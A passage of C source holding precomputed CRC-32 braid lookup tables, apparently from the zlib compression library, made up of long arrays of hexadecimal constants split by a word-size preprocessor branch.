0xaff299cd00000000, 0x709babf900000000, 0x6f8c5b7900000000, 0x0fb33a2300000000, 0x10a4caa300000000, 0xb1605e4b00000000, 0xae77aecb00000000, 0xce48cf9100000000, 0xd15f3f1100000000, 0x0e360d2500000000, 0x1121fda500000000, 0x711e9cff00000000, 0x6e096c7f00000000, 0x7291c4f500000000, 0x6d86347500000000, 0x0db9552f00000000, 0x12aea5af00000000, 0xcdc7979b00000000, 0xd2d0671b00000000, 0xb2ef064100000000, 0xadf8f6c100000000, 0x0c3c622900000000, 0x132b92a900000000, 0x7314f3f300000000, 0x6c03037300000000, 0xb36a314700000000, 0xac7dc1c700000000, 0xcc42a09d00000000, 0xd355501d00000000, 0x6ae900a700000000, 0x75fef02700000000, 0x15c1917d00000000, 0x0ad661fd00000000, 0xd5bf53c900000000, 0xcaa8a34900000000, 0xaa97c21300000000, 0xb580329300000000, 0x1444a67b00000000, 0x0b5356fb00000000, 0x6b6c37a100000000, 0x747bc72100000000, 0xab12f51500000000, 0xb405059500000000, 0xd43a64cf00000000, 0xcb2d944f00000000, 0xd7b53cc500000000, 0xc8a2cc4500000000, 0xa89dad1f00000000, 0xb78a5d9f00000000, 0x68e36fab00000000, 0x77f49f2b00000000, 0x17cbfe7100000000, 0x08dc0ef100000000, 0xa9189a1900000000, 0xb60f6a9900000000, 0xd6300bc300000000, 0xc927fb4300000000, 0x164ec97700000000, 0x095939f700000000, 0x696658ad00000000, 0x7671a82d00000000, 0x1050786300000000, 0x0f4788e300000000, 0x6f78e9b900000000, 0x706f193900000000, 0xaf062b0d00000000, 0xb011db8d00000000, 0xd02ebad700000000, 0xcf394a5700000000, 0x6efddebf00000000, 0x71ea2e3f00000000, 0x11d54f6500000000, 0x0ec2bfe500000000, 0xd1ab8dd100000000, 0xcebc7d5100000000, 0xae831c0b00000000, 0xb194ec8b00000000, 0xad0c440100000000, 0xb21bb48100000000, 0xd224d5db00000000, 0xcd33255b00000000, 0x125a176f00000000, 0x0d4de7ef00000000, 0x6d7286b500000000, 0x7265763500000000, 0xd3a1e2dd00000000, 0xccb6125d00000000, 0xac89730700000000, 0xb39e838700000000, 0x6cf7b1b300000000, 0x73e0413300000000, 0x13df206900000000, 0x0cc8d0e900000000, 0xdf9d80f400000000, 0xc08a707400000000, 0xa0b5112e00000000, 0xbfa2e1ae00000000, 0x60cbd39a00000000, 0x7fdc231a00000000, 0x1fe3424000000000, 
0x00f4b2c000000000, 0xa130262800000000, 0xbe27d6a800000000, 0xde18b7f200000000, 0xc10f477200000000, 0x1e66754600000000, 0x017185c600000000, 0x614ee49c00000000, 0x7e59141c00000000, 0x62c1bc9600000000, 0x7dd64c1600000000, 0x1de92d4c00000000, 0x02feddcc00000000, 0xdd97eff800000000, 0xc2801f7800000000, 0xa2bf7e2200000000, 0xbda88ea200000000, 0x1c6c1a4a00000000, 0x037beaca00000000, 0x63448b9000000000, 0x7c537b1000000000, 0xa33a492400000000, 0xbc2db9a400000000, 0xdc12d8fe00000000, 0xc305287e00000000, 0xa524f83000000000, 0xba3308b000000000, 0xda0c69ea00000000, 0xc51b996a00000000, 0x1a72ab5e00000000, 0x05655bde00000000, 0x655a3a8400000000, 0x7a4dca0400000000, 0xdb895eec00000000, 0xc49eae6c00000000, 0xa4a1cf3600000000, 0xbbb63fb600000000, 0x64df0d8200000000, 0x7bc8fd0200000000, 0x1bf79c5800000000, 0x04e06cd800000000, 0x1878c45200000000, 0x076f34d200000000, 0x6750558800000000, 0x7847a50800000000, 0xa72e973c00000000, 0xb83967bc00000000, 0xd80606e600000000, 0xc711f66600000000, 0x66d5628e00000000, 0x79c2920e00000000, 0x19fdf35400000000, 0x06ea03d400000000, 0xd98331e000000000, 0xc694c16000000000, 0xa6aba03a00000000, 0xb9bc50ba00000000}, {0x0000000000000000, 0xe2fd888d00000000, 0x85fd60c000000000, 0x6700e84d00000000, 0x4bfdb05b00000000, 0xa90038d600000000, 0xce00d09b00000000, 0x2cfd581600000000, 0x96fa61b700000000, 0x7407e93a00000000, 0x1307017700000000, 0xf1fa89fa00000000, 0xdd07d1ec00000000, 0x3ffa596100000000, 0x58fab12c00000000, 0xba0739a100000000, 0x6df3b2b500000000, 0x8f0e3a3800000000, 0xe80ed27500000000, 0x0af35af800000000, 0x260e02ee00000000, 0xc4f38a6300000000, 0xa3f3622e00000000, 0x410eeaa300000000, 0xfb09d30200000000, 0x19f45b8f00000000, 0x7ef4b3c200000000, 0x9c093b4f00000000, 0xb0f4635900000000, 0x5209ebd400000000, 0x3509039900000000, 0xd7f48b1400000000, 0x9be014b000000000, 0x791d9c3d00000000, 0x1e1d747000000000, 0xfce0fcfd00000000, 0xd01da4eb00000000, 0x32e02c6600000000, 0x55e0c42b00000000, 0xb71d4ca600000000, 0x0d1a750700000000, 0xefe7fd8a00000000, 
0x88e715c700000000, 0x6a1a9d4a00000000, 0x46e7c55c00000000, 0xa41a4dd100000000, 0xc31aa59c00000000, 0x21e72d1100000000, 0xf613a60500000000, 0x14ee2e8800000000, 0x73eec6c500000000, 0x91134e4800000000, 0xbdee165e00000000, 0x5f139ed300000000, 0x3813769e00000000, 0xdaeefe1300000000, 0x60e9c7b200000000, 0x82144f3f00000000, 0xe514a77200000000, 0x07e92fff00000000, 0x2b1477e900000000, 0xc9e9ff6400000000, 0xaee9172900000000, 0x4c149fa400000000, 0x77c758bb00000000, 0x953ad03600000000, 0xf23a387b00000000, 0x10c7b0f600000000, 0x3c3ae8e000000000, 0xdec7606d00000000, 0xb9c7882000000000, 0x5b3a00ad00000000, 0xe13d390c00000000, 0x03c0b18100000000, 0x64c059cc00000000, 0x863dd14100000000, 0xaac0895700000000, 0x483d01da00000000, 0x2f3de99700000000, 0xcdc0611a00000000, 0x1a34ea0e00000000, 0xf8c9628300000000, 0x9fc98ace00000000, 0x7d34024300000000, 0x51c95a5500000000, 0xb334d2d800000000, 0xd4343a9500000000, 0x36c9b21800000000, 0x8cce8bb900000000, 0x6e33033400000000, 0x0933eb7900000000, 0xebce63f400000000, 0xc7333be200000000, 0x25ceb36f00000000, 0x42ce5b2200000000, 0xa033d3af00000000, 0xec274c0b00000000, 0x0edac48600000000, 0x69da2ccb00000000, 0x8b27a44600000000, 0xa7dafc5000000000, 0x452774dd00000000, 0x22279c9000000000, 0xc0da141d00000000, 0x7add2dbc00000000, 0x9820a53100000000, 0xff204d7c00000000, 0x1dddc5f100000000, 0x31209de700000000, 0xd3dd156a00000000, 0xb4ddfd2700000000, 0x562075aa00000000, 0x81d4febe00000000, 0x6329763300000000, 0x04299e7e00000000, 0xe6d416f300000000, 0xca294ee500000000, 0x28d4c66800000000, 0x4fd42e2500000000, 0xad29a6a800000000, 0x172e9f0900000000, 0xf5d3178400000000, 0x92d3ffc900000000, 0x702e774400000000, 0x5cd32f5200000000, 0xbe2ea7df00000000, 0xd92e4f9200000000, 0x3bd3c71f00000000, 0xaf88c0ad00000000, 0x4d75482000000000, 0x2a75a06d00000000, 0xc88828e000000000, 0xe47570f600000000, 0x0688f87b00000000, 0x6188103600000000, 0x837598bb00000000, 0x3972a11a00000000, 0xdb8f299700000000, 0xbc8fc1da00000000, 0x5e72495700000000, 0x728f114100000000, 0x907299cc00000000, 
0xf772718100000000, 0x158ff90c00000000, 0xc27b721800000000, 0x2086fa9500000000, 0x478612d800000000, 0xa57b9a5500000000, 0x8986c24300000000, 0x6b7b4ace00000000, 0x0c7ba28300000000, 0xee862a0e00000000, 0x548113af00000000, 0xb67c9b2200000000, 0xd17c736f00000000, 0x3381fbe200000000, 0x1f7ca3f400000000, 0xfd812b7900000000, 0x9a81c33400000000, 0x787c4bb900000000, 0x3468d41d00000000, 0xd6955c9000000000, 0xb195b4dd00000000, 0x53683c5000000000, 0x7f95644600000000, 0x9d68eccb00000000, 0xfa68048600000000, 0x18958c0b00000000, 0xa292b5aa00000000, 0x406f3d2700000000, 0x276fd56a00000000, 0xc5925de700000000, 0xe96f05f100000000, 0x0b928d7c00000000, 0x6c92653100000000, 0x8e6fedbc00000000, 0x599b66a800000000, 0xbb66ee2500000000, 0xdc66066800000000, 0x3e9b8ee500000000, 0x1266d6f300000000, 0xf09b5e7e00000000, 0x979bb63300000000, 0x75663ebe00000000, 0xcf61071f00000000, 0x2d9c8f9200000000, 0x4a9c67df00000000, 0xa861ef5200000000, 0x849cb74400000000, 0x66613fc900000000, 0x0161d78400000000, 0xe39c5f0900000000, 0xd84f981600000000, 0x3ab2109b00000000, 0x5db2f8d600000000, 0xbf4f705b00000000, 0x93b2284d00000000, 0x714fa0c000000000, 0x164f488d00000000, 0xf4b2c00000000000, 0x4eb5f9a100000000, 0xac48712c00000000, 0xcb48996100000000, 0x29b511ec00000000, 0x054849fa00000000, 0xe7b5c17700000000, 0x80b5293a00000000, 0x6248a1b700000000, 0xb5bc2aa300000000, 0x5741a22e00000000, 0x30414a6300000000, 0xd2bcc2ee00000000, 0xfe419af800000000, 0x1cbc127500000000, 0x7bbcfa3800000000, 0x994172b500000000, 0x23464b1400000000, 0xc1bbc39900000000, 0xa6bb2bd400000000, 0x4446a35900000000, 0x68bbfb4f00000000, 0x8a4673c200000000, 0xed469b8f00000000, 0x0fbb130200000000, 0x43af8ca600000000, 0xa152042b00000000, 0xc652ec6600000000, 0x24af64eb00000000, 0x08523cfd00000000, 0xeaafb47000000000, 0x8daf5c3d00000000, 0x6f52d4b000000000, 0xd555ed1100000000, 0x37a8659c00000000, 0x50a88dd100000000, 0xb255055c00000000, 0x9ea85d4a00000000, 0x7c55d5c700000000, 0x1b553d8a00000000, 0xf9a8b50700000000, 0x2e5c3e1300000000, 0xcca1b69e00000000, 
0xaba15ed300000000, 0x495cd65e00000000, 0x65a18e4800000000, 0x875c06c500000000, 0xe05cee8800000000, 0x02a1660500000000, 0xb8a65fa400000000, 0x5a5bd72900000000, 0x3d5b3f6400000000, 0xdfa6b7e900000000, 0xf35befff00000000, 0x11a6677200000000, 0x76a68f3f00000000, 0x945b07b200000000}, {0x0000000000000000, 0xa90b894e00000000, 0x5217129d00000000, 0xfb1c9bd300000000, 0xe52855e100000000, 0x4c23dcaf00000000, 0xb73f477c00000000, 0x1e34ce3200000000, 0x8b57db1900000000, 0x225c525700000000, 0xd940c98400000000, 0x704b40ca00000000, 0x6e7f8ef800000000, 0xc77407b600000000, 0x3c689c6500000000, 0x9563152b00000000, 0x16afb63300000000, 0xbfa43f7d00000000, 0x44b8a4ae00000000, 0xedb32de000000000, 0xf387e3d200000000, 0x5a8c6a9c00000000, 0xa190f14f00000000, 0x089b780100000000, 0x9df86d2a00000000, 0x34f3e46400000000, 0xcfef7fb700000000, 0x66e4f6f900000000, 0x78d038cb00000000, 0xd1dbb18500000000, 0x2ac72a5600000000, 0x83cca31800000000, 0x2c5e6d6700000000, 0x8555e42900000000, 0x7e497ffa00000000, 0xd742f6b400000000, 0xc976388600000000, 0x607db1c800000000, 0x9b612a1b00000000, 0x326aa35500000000, 0xa709b67e00000000, 0x0e023f3000000000, 0xf51ea4e300000000, 0x5c152dad00000000, 0x4221e39f00000000, 0xeb2a6ad100000000, 0x1036f10200000000, 0xb93d784c00000000, 0x3af1db5400000000, 0x93fa521a00000000, 0x68e6c9c900000000, 0xc1ed408700000000, 0xdfd98eb500000000, 0x76d207fb00000000, 0x8dce9c2800000000, 0x24c5156600000000, 0xb1a6004d00000000, 0x18ad890300000000, 0xe3b112d000000000, 0x4aba9b9e00000000, 0x548e55ac00000000, 0xfd85dce200000000, 0x0699473100000000, 0xaf92ce7f00000000, 0x58bcdace00000000, 0xf1b7538000000000, 0x0aabc85300000000, 0xa3a0411d00000000, 0xbd948f2f00000000, 0x149f066100000000, 0xef839db200000000, 0x468814fc00000000, 0xd3eb01d700000000, 0x7ae0889900000000, 0x81fc134a00000000, 0x28f79a0400000000, 0x36c3543600000000, 0x9fc8dd7800000000, 0x64d446ab00000000, 0xcddfcfe500000000, 0x4e136cfd00000000, 0xe718e5b300000000, 0x1c047e6000000000, 0xb50ff72e00000000, 0xab3b391c00000000, 
0x0230b05200000000, 0xf92c2b8100000000, 0x5027a2cf00000000, 0xc544b7e400000000, 0x6c4f3eaa00000000, 0x9753a57900000000, 0x3e582c3700000000, 0x206ce20500000000, 0x89676b4b00000000, 0x727bf09800000000, 0xdb7079d600000000, 0x74e2b7a900000000, 0xdde93ee700000000, 0x26f5a53400000000, 0x8ffe2c7a00000000, 0x91cae24800000000, 0x38c16b0600000000, 0xc3ddf0d500000000, 0x6ad6799b00000000, 0xffb56cb000000000, 0x56bee5fe00000000, 0xada27e2d00000000, 0x04a9f76300000000, 0x1a9d395100000000, 0xb396b01f00000000, 0x488a2bcc00000000, 0xe181a28200000000, 0x624d019a00000000, 0xcb4688d400000000, 0x305a130700000000, 0x99519a4900000000, 0x8765547b00000000, 0x2e6edd3500000000, 0xd57246e600000000, 0x7c79cfa800000000, 0xe91ada8300000000, 0x401153cd00000000, 0xbb0dc81e00000000, 0x1206415000000000, 0x0c328f6200000000, 0xa539062c00000000, 0x5e259dff00000000, 0xf72e14b100000000, 0xf17ec44600000000, 0x58754d0800000000, 0xa369d6db00000000, 0x0a625f9500000000, 0x145691a700000000, 0xbd5d18e900000000, 0x4641833a00000000, 0xef4a0a7400000000, 0x7a291f5f00000000, 0xd322961100000000, 0x283e0dc200000000, 0x8135848c00000000, 0x9f014abe00000000, 0x360ac3f000000000, 0xcd16582300000000, 0x641dd16d00000000, 0xe7d1727500000000, 0x4edafb3b00000000, 0xb5c660e800000000, 0x1ccde9a600000000, 0x02f9279400000000, 0xabf2aeda00000000, 0x50ee350900000000, 0xf9e5bc4700000000, 0x6c86a96c00000000, 0xc58d202200000000, 0x3e91bbf100000000, 0x979a32bf00000000, 0x89aefc8d00000000, 0x20a575c300000000, 0xdbb9ee1000000000, 0x72b2675e00000000, 0xdd20a92100000000, 0x742b206f00000000, 0x8f37bbbc00000000, 0x263c32f200000000, 0x3808fcc000000000, 0x9103758e00000000, 0x6a1fee5d00000000, 0xc314671300000000, 0x5677723800000000, 0xff7cfb7600000000, 0x046060a500000000, 0xad6be9eb00000000, 0xb35f27d900000000, 0x1a54ae9700000000, 0xe148354400000000, 0x4843bc0a00000000, 0xcb8f1f1200000000, 0x6284965c00000000, 0x99980d8f00000000, 0x309384c100000000, 0x2ea74af300000000, 0x87acc3bd00000000, 0x7cb0586e00000000, 0xd5bbd12000000000, 0x40d8c40b00000000, 
0xe9d34d4500000000, 0x12cfd69600000000, 0xbbc45fd800000000, 0xa5f091ea00000000, 0x0cfb18a400000000, 0xf7e7837700000000, 0x5eec0a3900000000, 0xa9c21e8800000000, 0x00c997c600000000, 0xfbd50c1500000000, 0x52de855b00000000, 0x4cea4b6900000000, 0xe5e1c22700000000, 0x1efd59f400000000, 0xb7f6d0ba00000000, 0x2295c59100000000, 0x8b9e4cdf00000000, 0x7082d70c00000000, 0xd9895e4200000000, 0xc7bd907000000000, 0x6eb6193e00000000, 0x95aa82ed00000000, 0x3ca10ba300000000, 0xbf6da8bb00000000, 0x166621f500000000, 0xed7aba2600000000, 0x4471336800000000, 0x5a45fd5a00000000, 0xf34e741400000000, 0x0852efc700000000, 0xa159668900000000, 0x343a73a200000000, 0x9d31faec00000000, 0x662d613f00000000, 0xcf26e87100000000, 0xd112264300000000, 0x7819af0d00000000, 0x830534de00000000, 0x2a0ebd9000000000, 0x859c73ef00000000, 0x2c97faa100000000, 0xd78b617200000000, 0x7e80e83c00000000, 0x60b4260e00000000, 0xc9bfaf4000000000, 0x32a3349300000000, 0x9ba8bddd00000000, 0x0ecba8f600000000, 0xa7c021b800000000, 0x5cdcba6b00000000, 0xf5d7332500000000, 0xebe3fd1700000000, 0x42e8745900000000, 0xb9f4ef8a00000000, 0x10ff66c400000000, 0x9333c5dc00000000, 0x3a384c9200000000, 0xc124d74100000000, 0x682f5e0f00000000, 0x761b903d00000000, 0xdf10197300000000, 0x240c82a000000000, 0x8d070bee00000000, 0x18641ec500000000, 0xb16f978b00000000, 0x4a730c5800000000, 0xe378851600000000, 0xfd4c4b2400000000, 0x5447c26a00000000, 0xaf5b59b900000000, 0x0650d0f700000000}, {0x0000000000000000, 0x479244af00000000, 0xcf22f88500000000, 0x88b0bc2a00000000, 0xdf4381d000000000, 0x98d1c57f00000000, 0x1061795500000000, 0x57f33dfa00000000, 0xff81737a00000000, 0xb81337d500000000, 0x30a38bff00000000, 0x7731cf5000000000, 0x20c2f2aa00000000, 0x6750b60500000000, 0xefe00a2f00000000, 0xa8724e8000000000, 0xfe03e7f400000000, 0xb991a35b00000000, 0x31211f7100000000, 0x76b35bde00000000, 0x2140662400000000, 0x66d2228b00000000, 0xee629ea100000000, 0xa9f0da0e00000000, 0x0182948e00000000, 0x4610d02100000000, 0xcea06c0b00000000, 0x893228a400000000, 
0xdec1155e00000000, 0x995351f100000000, 0x11e3eddb00000000, 0x5671a97400000000, 0xbd01bf3200000000, 0xfa93fb9d00000000, 0x722347b700000000, 0x35b1031800000000, 0x62423ee200000000, 0x25d07a4d00000000, 0xad60c66700000000, 0xeaf282c800000000, 0x4280cc4800000000, 0x051288e700000000, 0x8da234cd00000000, 0xca30706200000000, 0x9dc34d9800000000, 0xda51093700000000, 0x52e1b51d00000000, 0x1573f1b200000000, 0x430258c600000000, 0x04901c6900000000, 0x8c20a04300000000, 0xcbb2e4ec00000000, 0x9c41d91600000000, 0xdbd39db900000000, 0x5363219300000000, 0x14f1653c00000000, 0xbc832bbc00000000, 0xfb116f1300000000, 0x73a1d33900000000, 0x3433979600000000, 0x63c0aa6c00000000, 0x2452eec300000000, 0xace252e900000000, 0xeb70164600000000, 0x7a037e6500000000, 0x3d913aca00000000, 0xb52186e000000000, 0xf2b3c24f00000000, 0xa540ffb500000000, 0xe2d2bb1a00000000, 0x6a62073000000000, 0x2df0439f00000000, 0x85820d1f00000000, 0xc21049b000000000, 0x4aa0f59a00000000, 0x0d32b13500000000, 0x5ac18ccf00000000, 0x1d53c86000000000, 0x95e3744a00000000, 0xd27130e500000000, 0x8400999100000000, 0xc392dd3e00000000, 0x4b22611400000000, 0x0cb025bb00000000, 0x5b43184100000000, 0x1cd15cee00000000, 0x9461e0c400000000, 0xd3f3a46b00000000, 0x7b81eaeb00000000, 0x3c13ae4400000000, 0xb4a3126e00000000, 0xf33156c100000000, 0xa4c26b3b00000000, 0xe3502f9400000000, 0x6be093be00000000, 0x2c72d71100000000, 0xc702c15700000000, 0x809085f800000000, 0x082039d200000000, 0x4fb27d7d00000000, 0x1841408700000000, 0x5fd3042800000000, 0xd763b80200000000, 0x90f1fcad00000000, 0x3883b22d00000000, 0x7f11f68200000000, 0xf7a14aa800000000, 0xb0330e0700000000, 0xe7c033fd00000000, 0xa052775200000000, 0x28e2cb7800000000, 0x6f708fd700000000, 0x390126a300000000, 0x7e93620c00000000, 0xf623de2600000000, 0xb1b19a8900000000, 0xe642a77300000000, 0xa1d0e3dc00000000, 0x29605ff600000000, 0x6ef21b5900000000, 0xc68055d900000000, 0x8112117600000000, 0x09a2ad5c00000000, 0x4e30e9f300000000, 0x19c3d40900000000, 0x5e5190a600000000, 0xd6e12c8c00000000, 0x9173682300000000, 
0xf406fcca00000000, 0xb394b86500000000, 0x3b24044f00000000, 0x7cb640e000000000, 0x2b457d1a00000000, 0x6cd739b500000000, 0xe467859f00000000, 0xa3f5c13000000000, 0x0b878fb000000000, 0x4c15cb1f00000000, 0xc4a5773500000000, 0x8337339a00000000, 0xd4c40e6000000000, 0x93564acf00000000, 0x1be6f6e500000000, 0x5c74b24a00000000, 0x0a051b3e00000000, 0x4d975f9100000000, 0xc527e3bb00000000, 0x82b5a71400000000, 0xd5469aee00000000, 0x92d4de4100000000, 0x1a64626b00000000, 0x5df626c400000000, 0xf584684400000000, 0xb2162ceb00000000, 0x3aa690c100000000, 0x7d34d46e00000000, 0x2ac7e99400000000, 0x6d55ad3b00000000, 0xe5e5111100000000, 0xa27755be00000000, 0x490743f800000000, 0x0e95075700000000, 0x8625bb7d00000000, 0xc1b7ffd200000000, 0x9644c22800000000, 0xd1d6868700000000, 0x59663aad00000000, 0x1ef47e0200000000, 0xb686308200000000, 0xf114742d00000000, 0x79a4c80700000000, 0x3e368ca800000000, 0x69c5b15200000000, 0x2e57f5fd00000000, 0xa6e749d700000000, 0xe1750d7800000000, 0xb704a40c00000000, 0xf096e0a300000000, 0x78265c8900000000, 0x3fb4182600000000, 0x684725dc00000000, 0x2fd5617300000000, 0xa765dd5900000000, 0xe0f799f600000000, 0x4885d77600000000, 0x0f1793d900000000, 0x87a72ff300000000, 0xc0356b5c00000000, 0x97c656a600000000, 0xd054120900000000, 0x58e4ae2300000000, 0x1f76ea8c00000000, 0x8e0582af00000000, 0xc997c60000000000, 0x41277a2a00000000, 0x06b53e8500000000, 0x5146037f00000000, 0x16d447d000000000, 0x9e64fbfa00000000, 0xd9f6bf5500000000, 0x7184f1d500000000, 0x3616b57a00000000, 0xbea6095000000000, 0xf9344dff00000000, 0xaec7700500000000, 0xe95534aa00000000, 0x61e5888000000000, 0x2677cc2f00000000, 0x7006655b00000000, 0x379421f400000000, 0xbf249dde00000000, 0xf8b6d97100000000, 0xaf45e48b00000000, 0xe8d7a02400000000, 0x60671c0e00000000, 0x27f558a100000000, 0x8f87162100000000, 0xc815528e00000000, 0x40a5eea400000000, 0x0737aa0b00000000, 0x50c497f100000000, 0x1756d35e00000000, 0x9fe66f7400000000, 0xd8742bdb00000000, 0x33043d9d00000000, 0x7496793200000000, 0xfc26c51800000000, 0xbbb481b700000000, 
0xec47bc4d00000000, 0xabd5f8e200000000, 0x236544c800000000, 0x64f7006700000000, 0xcc854ee700000000, 0x8b170a4800000000, 0x03a7b66200000000, 0x4435f2cd00000000, 0x13c6cf3700000000, 0x54548b9800000000, 0xdce437b200000000, 0x9b76731d00000000, 0xcd07da6900000000, 0x8a959ec600000000, 0x022522ec00000000, 0x45b7664300000000, 0x12445bb900000000, 0x55d61f1600000000, 0xdd66a33c00000000, 0x9af4e79300000000, 0x3286a91300000000, 0x7514edbc00000000, 0xfda4519600000000, 0xba36153900000000, 0xedc528c300000000, 0xaa576c6c00000000, 0x22e7d04600000000, 0x657594e900000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x65673b46, 0xcace768c, 0xafa94dca, 0x4eedeb59, 0x2b8ad01f, 0x84239dd5, 0xe144a693, 0x9ddbd6b2, 0xf8bcedf4, 0x5715a03e, 0x32729b78, 0xd3363deb, 0xb65106ad, 0x19f84b67, 0x7c9f7021, 0xe0c6ab25, 0x85a19063, 0x2a08dda9, 0x4f6fe6ef, 0xae2b407c, 0xcb4c7b3a, 0x64e536f0, 0x01820db6, 0x7d1d7d97, 0x187a46d1, 0xb7d30b1b, 0xd2b4305d, 0x33f096ce, 0x5697ad88, 0xf93ee042, 0x9c59db04, 0x1afc500b, 0x7f9b6b4d, 0xd0322687, 0xb5551dc1, 0x5411bb52, 0x31768014, 0x9edfcdde, 0xfbb8f698, 0x872786b9, 0xe240bdff, 0x4de9f035, 0x288ecb73, 0xc9ca6de0, 0xacad56a6, 0x03041b6c, 0x6663202a, 0xfa3afb2e, 0x9f5dc068, 0x30f48da2, 0x5593b6e4, 0xb4d71077, 0xd1b02b31, 0x7e1966fb, 0x1b7e5dbd, 0x67e12d9c, 0x028616da, 0xad2f5b10, 0xc8486056, 0x290cc6c5, 0x4c6bfd83, 0xe3c2b049, 0x86a58b0f, 0x35f8a016, 0x509f9b50, 0xff36d69a, 0x9a51eddc, 0x7b154b4f, 0x1e727009, 0xb1db3dc3, 0xd4bc0685, 0xa82376a4, 0xcd444de2, 0x62ed0028, 0x078a3b6e, 0xe6ce9dfd, 0x83a9a6bb, 0x2c00eb71, 0x4967d037, 0xd53e0b33, 0xb0593075, 0x1ff07dbf, 0x7a9746f9, 0x9bd3e06a, 0xfeb4db2c, 0x511d96e6, 0x347aada0, 0x48e5dd81, 0x2d82e6c7, 0x822bab0d, 0xe74c904b, 0x060836d8, 0x636f0d9e, 0xccc64054, 0xa9a17b12, 0x2f04f01d, 0x4a63cb5b, 0xe5ca8691, 0x80adbdd7, 0x61e91b44, 0x048e2002, 0xab276dc8, 0xce40568e, 0xb2df26af, 0xd7b81de9, 0x78115023, 0x1d766b65, 0xfc32cdf6, 0x9955f6b0, 0x36fcbb7a, 0x539b803c, 0xcfc25b38, 
0xaaa5607e, 0x050c2db4, 0x606b16f2, 0x812fb061, 0xe4488b27, 0x4be1c6ed, 0x2e86fdab, 0x52198d8a, 0x377eb6cc, 0x98d7fb06, 0xfdb0c040, 0x1cf466d3, 0x79935d95, 0xd63a105f, 0xb35d2b19, 0x6bf1402c, 0x0e967b6a, 0xa13f36a0, 0xc4580de6, 0x251cab75, 0x407b9033, 0xefd2ddf9, 0x8ab5e6bf, 0xf62a969e, 0x934dadd8, 0x3ce4e012, 0x5983db54, 0xb8c77dc7, 0xdda04681, 0x72090b4b, 0x176e300d, 0x8b37eb09, 0xee50d04f, 0x41f99d85, 0x249ea6c3, 0xc5da0050, 0xa0bd3b16, 0x0f1476dc, 0x6a734d9a, 0x16ec3dbb, 0x738b06fd, 0xdc224b37, 0xb9457071, 0x5801d6e2, 0x3d66eda4, 0x92cfa06e, 0xf7a89b28, 0x710d1027, 0x146a2b61, 0xbbc366ab, 0xdea45ded, 0x3fe0fb7e, 0x5a87c038, 0xf52e8df2, 0x9049b6b4, 0xecd6c695, 0x89b1fdd3, 0x2618b019, 0x437f8b5f, 0xa23b2dcc, 0xc75c168a, 0x68f55b40, 0x0d926006, 0x91cbbb02, 0xf4ac8044, 0x5b05cd8e, 0x3e62f6c8, 0xdf26505b, 0xba416b1d, 0x15e826d7, 0x708f1d91, 0x0c106db0, 0x697756f6, 0xc6de1b3c, 0xa3b9207a, 0x42fd86e9, 0x279abdaf, 0x8833f065, 0xed54cb23, 0x5e09e03a, 0x3b6edb7c, 0x94c796b6, 0xf1a0adf0, 0x10e40b63, 0x75833025, 0xda2a7def, 0xbf4d46a9, 0xc3d23688, 0xa6b50dce, 0x091c4004, 0x6c7b7b42, 0x8d3fddd1, 0xe858e697, 0x47f1ab5d, 0x2296901b, 0xbecf4b1f, 0xdba87059, 0x74013d93, 0x116606d5, 0xf022a046, 0x95459b00, 0x3aecd6ca, 0x5f8bed8c, 0x23149dad, 0x4673a6eb, 0xe9daeb21, 0x8cbdd067, 0x6df976f4, 0x089e4db2, 0xa7370078, 0xc2503b3e, 0x44f5b031, 0x21928b77, 0x8e3bc6bd, 0xeb5cfdfb, 0x0a185b68, 0x6f7f602e, 0xc0d62de4, 0xa5b116a2, 0xd92e6683, 0xbc495dc5, 0x13e0100f, 0x76872b49, 0x97c38dda, 0xf2a4b69c, 0x5d0dfb56, 0x386ac010, 0xa4331b14, 0xc1542052, 0x6efd6d98, 0x0b9a56de, 0xeadef04d, 0x8fb9cb0b, 0x201086c1, 0x4577bd87, 0x39e8cda6, 0x5c8ff6e0, 0xf326bb2a, 0x9641806c, 0x770526ff, 0x12621db9, 0xbdcb5073, 0xd8ac6b35}, {0x00000000, 0xd7e28058, 0x74b406f1, 0xa35686a9, 0xe9680de2, 0x3e8a8dba, 0x9ddc0b13, 0x4a3e8b4b, 0x09a11d85, 0xde439ddd, 0x7d151b74, 0xaaf79b2c, 0xe0c91067, 0x372b903f, 0x947d1696, 0x439f96ce, 0x13423b0a, 0xc4a0bb52, 0x67f63dfb, 0xb014bda3, 0xfa2a36e8, 0x2dc8b6b0, 0x8e9e3019, 
0x597cb041, 0x1ae3268f, 0xcd01a6d7, 0x6e57207e, 0xb9b5a026, 0xf38b2b6d, 0x2469ab35, 0x873f2d9c, 0x50ddadc4, 0x26847614, 0xf166f64c, 0x523070e5, 0x85d2f0bd, 0xcfec7bf6, 0x180efbae, 0xbb587d07, 0x6cbafd5f, 0x2f256b91, 0xf8c7ebc9, 0x5b916d60, 0x8c73ed38, 0xc64d6673, 0x11afe62b, 0xb2f96082, 0x651be0da, 0x35c64d1e, 0xe224cd46, 0x41724bef, 0x9690cbb7, 0xdcae40fc, 0x0b4cc0a4, 0xa81a460d, 0x7ff8c655, 0x3c67509b, 0xeb85d0c3, 0x48d3566a, 0x9f31d632, 0xd50f5d79, 0x02eddd21, 0xa1bb5b88, 0x7659dbd0, 0x4d08ec28, 0x9aea6c70, 0x39bcead9, 0xee5e6a81, 0xa460e1ca, 0x73826192, 0xd0d4e73b, 0x07366763, 0x44a9f1ad, 0x934b71f5, 0x301df75c, 0xe7ff7704, 0xadc1fc4f, 0x7a237c17, 0xd975fabe, 0x0e977ae6, 0x5e4ad722, 0x89a8577a, 0x2afed1d3, 0xfd1c518b, 0xb722dac0, 0x60c05a98, 0xc396dc31, 0x14745c69, 0x57ebcaa7, 0x80094aff, 0x235fcc56, 0xf4bd4c0e, 0xbe83c745, 0x6961471d, 0xca37c1b4, 0x1dd541ec, 0x6b8c9a3c, 0xbc6e1a64, 0x1f389ccd, 0xc8da1c95, 0x82e497de, 0x55061786, 0xf650912f, 0x21b21177, 0x622d87b9, 0xb5cf07e1, 0x16998148, 0xc17b0110, 0x8b458a5b, 0x5ca70a03, 0xfff18caa, 0x28130cf2, 0x78cea136, 0xaf2c216e, 0x0c7aa7c7, 0xdb98279f, 0x91a6acd4, 0x46442c8c, 0xe512aa25, 0x32f02a7d, 0x716fbcb3, 0xa68d3ceb, 0x05dbba42, 0xd2393a1a, 0x9807b151, 0x4fe53109, 0xecb3b7a0, 0x3b5137f8, 0x9a11d850, 0x4df35808, 0xeea5dea1, 0x39475ef9, 0x7379d5b2, 0xa49b55ea, 0x07cdd343, 0xd02f531b, 0x93b0c5d5, 0x4452458d, 0xe704c324, 0x30e6437c, 0x7ad8c837, 